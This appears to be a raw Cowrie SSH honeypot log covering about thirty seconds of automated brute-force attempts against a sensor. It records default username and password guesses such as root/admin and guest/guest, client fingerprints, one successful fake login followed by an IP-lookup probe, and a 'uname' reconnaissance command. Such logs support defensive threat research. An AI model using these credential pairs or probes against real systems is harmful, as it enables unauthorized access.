{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:42:49.136103Z","src_ip":"212.227.125.160","session":"d8b3ae4539d9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:42:49.136817Z","src_ip":"212.227.125.160","session":"d8b3ae4539d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:49.320729Z","src_ip":"212.227.125.160","session":"d8b3ae4539d9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:49.322017Z","src_ip":"212.227.125.160","session":"d8b3ae4539d9"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:50.012995Z","src_ip":"212.227.235.229","session":"03fcee5435c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40016,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9a449f0ca48","protocol":"ssh","message":"New connection: 212.227.125.160:40016 (1.2.3.4:22) [session: b9a449f0ca48]","sensor":"my-vps","timestamp":"2025-08-31T04:42:50.252116Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60474,"dst_ip":"1.2.3.4","dst_port":22,"session":"058406315b06","protocol":"ssh","message":"New connection: 212.227.235.229:60474 (1.2.3.4:22) [session: 058406315b06]","sensor":"my-vps","timestamp":"2025-08-31T04:42:54.392636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:42:54.393808Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:42:54.522047Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:55.117962Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56798,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a006bfa1225","protocol":"ssh","message":"New connection: 217.72.205.35:56798 (1.2.3.4:22) [session: 8a006bfa1225]","sensor":"my-vps","timestamp":"2025-08-31T04:42:56.193577Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:56.194926Z","src_ip":"217.72.205.35","session":"8a006bfa1225"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345","message":"login attempt [guest/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:56.248187Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54046,"dst_ip":"1.2.3.4","dst_port":22,"session":"74ecbaf6e5d2","protocol":"ssh","message":"New connection: 212.227.235.229:54046 (1.2.3.4:22) [session: 74ecbaf6e5d2]","sensor":"my-vps","timestamp":"2025-08-31T04:42:57.153701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:42:57.299236Z","src_ip":"212.227.235.229","session":"74ecbaf6e5d2"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:57.377316Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:42:57.434600Z","src_ip":"212.227.235.229","session":"74ecbaf6e5d2"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest@123","message":"login attempt [guest/guest@123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:58.506820Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52812,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3a2047829a1","protocol":"ssh","message":"New connection: 212.227.125.160:52812 (1.2.3.4:22) [session: f3a2047829a1]","sensor":"my-vps","timestamp":"2025-08-31T04:42:58.625511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:58.626172Z","src_ip":"212.227.125.160","session":"f3a2047829a1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:58.813998Z","src_ip":"212.227.125.160","session":"f3a2047829a1"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:42:58.817953Z","src_ip":"212.227.235.229","session":"74ecbaf6e5d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:42:59.107116Z","session":"74ecbaf6e5d2"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:59.378964Z","src_ip":"212.227.125.160","session":"f3a2047829a1"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:59.637467Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:43:00.503895Z","src_ip":"212.227.235.229","session":"74ecbaf6e5d2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:00.569181Z","src_ip":"212.227.125.160","session":"f3a2047829a1"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:00.767197Z","src_ip":"212.227.235.229","session":"058406315b06"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:01.054430Z","src_ip":"212.227.235.229","session":"74ecbaf6e5d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51946,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a70e65136bb","protocol":"ssh","message":"New connection: 212.227.235.229:51946 (1.2.3.4:22) [session: 8a70e65136bb]","sensor":"my-vps","timestamp":"2025-08-31T04:43:03.587578Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52858,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f762ed791ec","protocol":"ssh","message":"New connection: 212.227.125.160:52858 (1.2.3.4:22) [session: 5f762ed791ec]","sensor":"my-vps","timestamp":"2025-08-31T04:43:03.890508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:03.891170Z","src_ip":"212.227.125.160","session":"5f762ed791ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:04.075367Z","src_ip":"212.227.125.160","session":"5f762ed791ec"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:04.280926Z","src_ip":"212.227.235.229","session":"8a70e65136bb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:43:04.281855Z","src_ip":"212.227.235.229","session":"8a70e65136bb"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:04.624162Z","src_ip":"212.227.125.160","session":"5f762ed791ec"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:05.809107Z","src_ip":"212.227.125.160","session":"5f762ed791ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55760,"dst_ip":"1.2.3.4","dst_port":22,"session":"71c5efc0a738","protocol":"ssh","message":"New connection: 212.227.235.229:55760 (1.2.3.4:22) [session: 71c5efc0a738]","sensor":"my-vps","timestamp":"2025-08-31T04:43:08.513660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:08.953551Z","src_ip":"212.227.235.229","session":"71c5efc0a738"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:08.986549Z","src_ip":"212.227.235.229","session":"71c5efc0a738"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43166,"dst_ip":"1.2.3.4","dst_port":22,"session":"36a993bc5674","protocol":"ssh","message":"New connection: 212.227.125.160:43166 (1.2.3.4:22) [session: 36a993bc5674]","sensor":"my-vps","timestamp":"2025-08-31T04:43:09.245964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:09.246993Z","src_ip":"212.227.125.160","session":"36a993bc5674"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:09.435568Z","src_ip":"212.227.125.160","session":"36a993bc5674"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456789","message":"login attempt [postgres/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:09.843551Z","src_ip":"212.227.235.229","session":"8a70e65136bb"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:10.003529Z","src_ip":"212.227.125.160","session":"36a993bc5674"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:11.196077Z","src_ip":"212.227.125.160","session":"36a993bc5674"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:11.700846Z","src_ip":"212.227.235.229","session":"8a70e65136bb"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:11.739059Z","src_ip":"212.227.235.229","session":"71c5efc0a738"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:13.023856Z","src_ip":"212.227.235.229","session":"71c5efc0a738"}
{"eventid":"cowrie.session.closed","duration":"65.2","message":"Connection lost after 65.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:15.151329Z","src_ip":"212.227.125.160","session":"76172e19d8be"}
{"eventid":"cowrie.session.closed","duration":"30.2","message":"Connection lost after 30.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:20.486804Z","src_ip":"212.227.125.160","session":"b9a449f0ca48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52952,"dst_ip":"1.2.3.4","dst_port":22,"session":"c910ebf3f39d","protocol":"ssh","message":"New connection: 212.227.235.229:52952 (1.2.3.4:22) [session: c910ebf3f39d]","sensor":"my-vps","timestamp":"2025-08-31T04:43:21.309855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:21.325320Z","src_ip":"212.227.235.229","session":"c910ebf3f39d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59850,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbf8d5f01eff","protocol":"ssh","message":"New connection: 212.227.235.229:59850 (1.2.3.4:22) [session: fbf8d5f01eff]","sensor":"my-vps","timestamp":"2025-08-31T04:43:21.445183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:21.454840Z","src_ip":"212.227.235.229","session":"fbf8d5f01eff"}
